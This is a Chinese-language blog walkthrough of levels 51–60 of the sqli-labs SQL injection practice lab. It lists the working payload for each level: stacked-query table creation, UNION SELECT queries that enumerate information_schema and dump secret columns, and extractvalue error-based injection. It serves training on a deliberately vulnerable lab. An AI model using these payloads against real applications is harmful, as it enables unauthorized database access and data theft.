sqli-labs闯关之51-60关

第五十一关

这一关和三十八关基本一样 ,堆叠注入问题  只不过是字符型

?sort=1';create table test51 like users;%23

%23是URL编码,(当然这里用#也行),本义是  #

常见的还有%27        本义是  '     %a0  空格

 查看下数据库,

第五十二关

堆叠注入

和五十关一样,只不过不显示错误,还有就是数字型(对于字符型少个单引号)
?sort=1;create table test52 like users;%23

 

第五十三关

和五十一关一样,区别是不显示错误

?sort=1';create table test53 like users;%23

第五十四关

这一关没什么特别  特别在于查询的次数 ,只能输入10次注入信息,记录方式是cookie。 

从54关开始,就是提升巩固的关卡,并且开始慢慢偏向实际。

第54关就是对输入的次数做了限制,需要在十次之内获取信息,否则就会刷新表名列名等信息。

查库  ?id=-1%27%20union%20select%201,database(),%27

%27  url解码后  '    %20  url解码后是,一个空格,

%201  url解码后  是一个空格1

 

查表     ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

 爆列      ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='iuhk2ue43a(后面这关name是咱们刚才查到的)

爆数据        ?id=-1' union select 1,group_concat(secret_SFZM),3 from iuhk2ue43a%23(爆咱刚才查到的一张表的数据)

 将我们刚才获得的输入得到这个

 

第五十五关

和上一关一样,只是把单引号换成了括号,一共可以输入14次

查库  ?id=-1%29%20union%20select%201,database(),3%23

%29  url解码后为  )

查库  ?id=-1) union select 1,database(),3%23或者?id=-1) union select 1,3,database()%23

查表        ?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23(和上一关一样,只是把引号改成括号了)

第五十六关

和之前一样,通过测试发现是单引号括号闭合,其他的操作一样

 看数据库名      ?id=-1') union select 1,database(),3%23

第五十七关

经过测试,发现是双引号闭合,其他和前几关一样

--+可以替换成  url编码的  %23

 查询数据库名                ?id=-1" union select 1,database(),3%23(基本一样不再截图)

第五十八关

这关只有5次机会。。。

 后来发现没有回显,一查,这一关不能用union select语句了,那我们报错试一下

报错输入获得数据库名                  

?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

 那就说明报错说明可以的,报错注入在之前的文章有介绍,不在这里在做解释

第五十九关

和上一关一样只不过没有单引号

报错输入获得数据库名        ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23

第六十关

和上一关一样,只不过多了双引号和括号?id=0")

报错输入获得数据库名             ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23

获取表名      ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

爆列名      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='7toozmjyw3'),0x7e))--+

爆数据      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_FK3H) from 7toozmjyw3),0x7e))--+

 输入进去后

BUG OFF YOU SILLY DUMB HACKER(滚开你这个愚蠢的黑客)

 结束

原文地址:https://www.cnblogs.com/escwq/p/12264085.html